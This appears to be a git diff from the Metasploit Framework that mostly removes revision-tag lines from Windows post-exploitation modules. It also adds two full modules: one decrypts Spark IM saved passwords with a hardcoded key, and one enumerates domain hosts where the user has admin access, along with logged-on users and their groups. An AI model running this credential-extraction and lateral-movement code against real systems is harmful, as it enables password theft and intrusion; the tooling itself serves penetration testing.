'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index f7da31eb64..ec3b6b1aa2 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Post particular category. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sinn3r', #Metasploit diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 21067309a1..745e30410b 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Post 'Shubham Dawra ' # www.SecurityXploded.com ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/meebo.rb b/modules/post/windows/gather/credentials/meebo.rb index 96f3a10d27..bb5818b6b9 100644 --- a/modules/post/windows/gather/credentials/meebo.rb +++ b/modules/post/windows/gather/credentials/meebo.rb @@ -1,7 +1,3 @@ -## -#$Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Post 'Sil3ntDre4m ', 'SecurityXploded Team ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 962961962f..fbb7b19e8d 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Post 'hdm', #Helped write the Decryption Routine 'mubix' #Helped write the Decryption Routine ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index a2e2efca15..d2b084ee16 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Post 'sil3ntdre4m ', 'SecurityXploded Team', #www.SecurityXploded.com ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index e1d0d29675..f9bf10b3e3 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Justin Cacak'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb index 987dace187..238ba962ed 100644 --- a/modules/post/windows/gather/credentials/smartftp.rb +++ b/modules/post/windows/gather/credentials/smartftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Windows Gather SmartFTP Saved Password Extraction', - 'Version' => '$Revision$', 'Description' => %q{ This module finds saved login credentials for the SmartFTP FTP client for windows. It finds the saved passwords and decrypts diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb new file mode 100644 index 0000000000..d1453b2eb4 --- /dev/null +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -0,0 +1,124 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/windows/user_profiles' +require 'openssl' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::Windows::UserProfiles + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows Gather Spark IM Password Extraction', + 'Description' => %q{ + This module will enumerate passwords stored by the Spark IM client. + The encryption key is publicly known. This module will not only extract encrypted + password but will also decrypt password using public key. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Brandon McCann "zeknox" ', + 'Thomas McCarthy "smilingraccoon" ' + ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => + [ + [ 'URL', 'http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/'] + ] + )) + end + + # decrypt spark password + def decrypt(hash) + # code to decrypt hash with KEY + encrypted = hash.unpack("m")[0] + key = "ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae".unpack("m")[0] + + cipher = OpenSSL::Cipher::Cipher.new 'des-ede3' + cipher.decrypt + cipher.key = key + + password = cipher.update encrypted + password << cipher.final + + password = ::Rex::Text.to_utf8(password) + + user, pass = password.scan(/[[:print:]]+/) + if pass.nil? or pass.empty? + print_status("Username found: #{user}, but no password") + pass = '' + else + print_good("Decrypted Username #{user} Password: #{pass}") + end + + store_creds(user, pass) + end + + def store_creds(user, pass) + if db + report_auth_info( + :host => client.sock.peerhost, + :port => 5222, + :ptype => 'password', + :sname => 'spark', + :user => user, + :pass => pass, + :duplicate_ok => true, + :active => true + ) + print_status("Loot stored in the db") + end + end + + # main control method + def run + grab_user_profiles().each do |user| + unless user['AppData'].nil? + accounts = user['AppData'] + "\\Spark\\spark.properties" + + # open the file for reading + config = client.fs.file.new(accounts, 'r') rescue nil + next if config.nil? + print_status("Config found for user #{user['UserName']}") + + # read the contents of file + contents = config.read + + # look for lines containing string 'password' + password = contents.split("\n").grep(/password/) + if password.nil? + # file doesn't contain a password + print_status("#{file} does not contain any saved passwords") + # close file and return + config.close + return + end + + # store the hash close the file + password = password.delete_if {|e| e !~ /password.+=.+=\r/} + password.each do | pass | + if pass.nil? + next + end + + hash = pass.split("password").join.chomp + print_status("Spark password hash: #{hash}") if datastore['VERBOSE'] + + # call method to decrypt hash + decrypt(hash) + end + config.close + end + end + end +end diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index fe3f85b2ee..6620923307 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +27,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/trillian.rb b/modules/post/windows/gather/credentials/trillian.rb index 560712bff2..4a411168bd 100644 --- a/modules/post/windows/gather/credentials/trillian.rb +++ b/modules/post/windows/gather/credentials/trillian.rb @@ -1,7 +1,3 @@ -## -#$Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Post 'Sil3ntDre4m ', 'SecurityXploded Team', #www.SecurityXploded.com ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index e205affde7..2cacaa380a 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # post/windows/gather/enum_vnc_pw.rb ## @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Post 'Kurt Grutzmacher ', 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index b7a570e264..0cc826870d 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Post [ 'Myo Soe ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index 190f106117..d63bb4f8b0 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # post/windows/gather/enum_vnc_pw.rb ## @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, 'Name' => 'Windows Gather WinSCP Saved Password Extraction', - 'Version' => '$Revision$', 'Description' => %q{ This module extracts weakly encrypted saved passwords from WinSCP. It searches for saved sessions in the Windows Registry diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb index 854d29cf4a..6a1c5853bd 100644 --- a/modules/post/windows/gather/credentials/wsftp_client.rb +++ b/modules/post/windows/gather/credentials/wsftp_client.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +27,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index 3348dc06b1..9de09578c2 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Post names, volume serial numbers, and more. }, 'License' => MSF_LICENSE, 'Author' => [ 'davehull '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index 0bce589801..c78ecd18c9 100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate all installed applications }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index 42b45c12ac..69866a3f4e 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post sensitive information. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => diff --git a/modules/post/windows/gather/enum_devices.rb b/modules/post/windows/gather/enum_devices.rb index 138e405525..eac863262e 100644 --- a/modules/post/windows/gather/enum_devices.rb +++ b/modules/post/windows/gather/enum_devices.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Post background job. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Brandon Perry ' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index a3e1635e96..bdbad7e5dd 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Post %PATH% variable. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => diff --git a/modules/post/windows/gather/enum_domain.rb b/modules/post/windows/gather/enum_domain.rb index 38aa18048c..0f73c4fb6f 100644 --- a/modules/post/windows/gather/enum_domain.rb +++ b/modules/post/windows/gather/enum_domain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Joshua Abraham '] diff --git a/modules/post/windows/gather/enum_domain_group_users.rb b/modules/post/windows/gather/enum_domain_group_users.rb index 311cea1d13..df6fe7333d 100644 --- a/modules/post/windows/gather/enum_domain_group_users.rb +++ b/modules/post/windows/gather/enum_domain_group_users.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Post 'Carlos Perez ', 'Stephen Haywood ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb index f7ab6647b9..d09a240ae6 100644 --- a/modules/post/windows/gather/enum_domain_tokens.rb +++ b/modules/post/windows/gather/enum_domain_tokens.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win'], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_hostfile.rb b/modules/post/windows/gather/enum_hostfile.rb index 6b70e74c78..8383c3df61 100644 --- a/modules/post/windows/gather/enum_hostfile.rb +++ b/modules/post/windows/gather/enum_hostfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Post }, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/windows/gather/enum_logged_on_users.rb b/modules/post/windows/gather/enum_logged_on_users.rb index 0d044ee67d..f79a4fa054 100644 --- a/modules/post/windows/gather/enum_logged_on_users.rb +++ b/modules/post/windows/gather/enum_logged_on_users.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate current and recently logged on Windows users}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index c660cf0168..d1c272a787 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate the OS license key }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon Perry '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index 39f2bf5609..78e0035280 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate Microsoft Powershell settings }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index 226ece1303..723ffcc569 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -14,12 +10,11 @@ require 'msf/core/post/windows/services' class Metasploit3 < Msf::Post - include Post::Windows::WindowsServices + include Post::Windows::Services def initialize super( 'Name' => 'Windows Gather Proxy Setting', - 'Version' => '$Revision$', 'Description' => %q{ This module pulls a user's proxy settings. If neither RHOST or SID are set it pulls the current user, else it will pull the user's settings diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index 8698f83dff..6ee9f4aede 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -16,7 +12,7 @@ require 'msf/core/post/windows/services' class Metasploit3 < Msf::Post - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services def initialize(info={}) super(update_info(info, @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Post migrate to a safe process (explorer.exe for example). }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Keith Faber', 'Kx499'] diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index 4f0d2adb40..04522ba2e4 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate configured and recently used file shares}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_snmp.rb b/modules/post/windows/gather/enum_snmp.rb index ed91475bb0..adce91bc6d 100644 --- a/modules/post/windows/gather/enum_snmp.rb +++ b/modules/post/windows/gather/enum_snmp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate the SNMP service configuration }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ', 'Tebo '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index eb9a8f5c52..1e9bdabb73 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # post/windows/gather/enum_termserv.rb ## @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index f2b0a2b422..ea9b850b65 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Post privileges are available, the script will not continue. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Joshua Abraham '] diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index a5ef8ea706..fb7e1d8f5d 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -1,4 +1,3 @@ -# $Id$ # # List physical drives and logical volumes on the remote system # @@ -14,7 +13,6 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Gather Physical Drives and Logical Volumes', 'Description' => %q{This module will list physical drives and logical volumes}, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Wesley McGrew '] diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index 339e89bd7e..df2c8f769a 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -1,4 +1,3 @@ -# $Id$ # # Forensic byte-for-byte imaging of remote disks and volumes # @@ -17,7 +16,6 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Gather Forensic Imaging', 'Description' => %q{This module will perform byte-for-byte imaging of remote disks and volumes}, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Wesley McGrew '] diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index 8326665764..4e85c89abe 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - # nbd_server.rb # # Maps remote disks and logical volumes to a local Network Block Device @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Post Allows for forensic tools to be executed on the remote disk directly. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Wesley McGrew '] diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index d98c0c48b8..83c2f566eb 100644 --- a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will dump the local user accounts from the SAM database using the registry }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb new file mode 100644 index 0000000000..72cfcc8d7f --- /dev/null +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -0,0 +1,258 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' + +class Metasploit3 < Msf::Post + + include Msf::Post::Windows::Priv + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Post::Common + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows Gather Local Admin Search', + 'Description' => %q{ + This module will identify systems in a given range that the + supplied domain user (should migrate into a user pid) has administrative + access to by using the Windows API OpenSCManagerA to establishing a handle + to the remote host. Additionally it can enumerate logged in users and group + membership via Windows API NetWkstaUserEnum and NetUserGetGroups. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Brandon McCann "zeknox" ', + 'Thomas McCarthy "smilingraccoon" ', + 'Royce Davis "r3dy" ' + ], + 'Platform' => [ 'windows'], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options( + [ + OptBool.new('ENUM_USERS', [ true, 'Enumerates logged on users.', true]), + OptBool.new('ENUM_GROUPS', [ false, 'Enumerates groups for identified users.', true]), + OptString.new('DOMAIN', [false, 'Domain to enumerate user\'s groups for']), + OptString.new('DOMAIN_CONTROLLER', [false, 'Domain Controller to query groups']) + ], self.class) + end + + def setup + super + + # This datastore option can be modified during runtime. + # Saving it here so the modified value remains with this module. + @domain_controller = datastore['DOMAIN_CONTROLLER'] + + if is_system? + # running as SYSTEM and will not pass any network credentials + print_error "Running as SYSTEM, module should be run with USER level rights" + return + else + @adv = client.railgun.advapi32 + + # Get domain and domain controller if options left blank + if datastore['DOMAIN'].nil? or datastore['DOMAIN'].empty? + user = client.sys.config.getuid + datastore['DOMAIN'] = user.split('\\')[0] + end + + if @domain_controll.nil? and datastore['ENUM_GROUPS'] + @dc_error = false + + # Uses DC which applied policy since it would be a DC this device normally talks to + cmd = "gpresult /SCOPE COMPUTER" + # If Vista/2008 or later add /R + if (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) + cmd << " /R" + end + res = cmd_exec("cmd.exe","/c #{cmd}") + + # Check if RSOP data exists, if not disable group check + unless res =~ /does not have RSOP data./ + @domain_controller = /Group Policy was applied from:\s*(.*)\s*/.match(res)[1].chomp + else + @dc_error = true + print_error("User never logged into device, will not enumerate groups or manually specify DC.") + end + end + end + end + + # main control method + def run_host(ip) + connect(ip) + end + + # http://msdn.microsoft.com/en-us/library/windows/desktop/aa370669(v=vs.85).aspx + # enumerate logged in users + def enum_users(host) + userlist = Array.new + + begin + # Connect to host and enumerate logged in users + winsessions = client.railgun.netapi32.NetWkstaUserEnum("\\\\#{host}", 1, 4, -1, 4, 4, nil) + rescue ::Exception => e + print_error("Issue enumerating users on #{host}") + return userlist + end + + return userlist if winsessions.nil? + + count = winsessions['totalentries'] * 2 + startmem = winsessions['bufptr'] + + base = 0 + userlist = Array.new + begin + mem = client.railgun.memread(startmem, 8*count) + rescue ::Exception => e + print_error("Issue reading memory for #{host}") + vprint_error(e.to_s) + return userlist + end + # For each entry returned, get domain and name of logged in user + begin + count.times{|i| + temp = {} + userptr = mem[(base + 0),4].unpack("V*")[0] + temp[:user] = client.railgun.memread(userptr,255).split("\0\0")[0].split("\0").join + nameptr = mem[(base + 4),4].unpack("V*")[0] + temp[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join + + # Ignore if empty or machine account + unless temp[:user].empty? or temp[:user][-1, 1] == "$" + + # Check if enumerated user's domain matches supplied domain, if there was + # an error, or if option disabled + data = "" + if datastore['DOMAIN'].upcase == temp[:domain].upcase and not @dc_error and datastore['ENUM_GROUPS'] + data << " - Groups: #{enum_groups(temp[:user]).chomp(", ")}" + end + line = "\tLogged in user:\t#{temp[:domain]}\\#{temp[:user]}#{data}\n" + + # Write user and groups to notes database + db_note(host, "#{temp[:domain]}\\#{temp[:user]}#{data}", "localadmin.user.loggedin") + userlist << line unless userlist.include? line + + end + + base = base + 8 + } + rescue ::Exception => e + print_error("Issue enumerating users on #{host}") + vprint_error(e.backtrace) + end + return userlist + end + + # http://msdn.microsoft.com/en-us/library/windows/desktop/aa370653(v=vs.85).aspx + # Enumerate groups for identified users + def enum_groups(user) + grouplist = "" + + dc = "\\\\#{@domain_controller}" + begin + # Connect to DC and enumerate groups of user + usergroups = client.railgun.netapi32.NetUserGetGroups(dc, user, 0, 4, -1, 4, 4) + rescue ::Exception => e + print_error("Issue connecting to DC, try manually setting domain and DC") + vprint_error(e.to_s) + return grouplist + end + + count = usergroups['totalentries'] + startmem = usergroups['bufptr'] + base = 0 + + begin + mem = client.railgun.memread(startmem, 8*count) + rescue ::Exception => e + print_error("Issue reading 